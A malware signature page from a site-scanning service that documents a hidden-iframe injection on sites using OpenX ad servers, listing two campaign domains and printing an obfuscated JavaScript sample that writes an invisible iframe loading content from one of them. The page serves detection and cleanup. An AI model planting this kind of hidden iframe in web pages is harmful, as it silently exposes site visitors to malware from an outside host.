SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwiframehd476

malware-entry-mwiframehd476

Description: A Hidden iframe was detected. This is often used to load malware
from infected OpenX ad servers. Domains used in the malware campaign:

 


sideche.com
nobeecar.com

Affecting: Any web site (using OpenX)

Clean up: Sign up here to get your site fixed: signup

Malware dump (sample of malware):


dc&#46writeln("<"+"script type="text/javascript"><"+"!--");dc&#46writeln("var host=' widt'+'h=1 h'+'eight'+'=1 '; var src='src='; var brdr='fra'+'mebor'+'der='+'0';var sc='http://nobeecar.com/building/fast ';");dc.writeln("document.write('<"+"ifr'+'ame'+host+src+sc+brdr+'><"+"/ifra'+'me>');");dc.writeln("//--><"+"/script>";);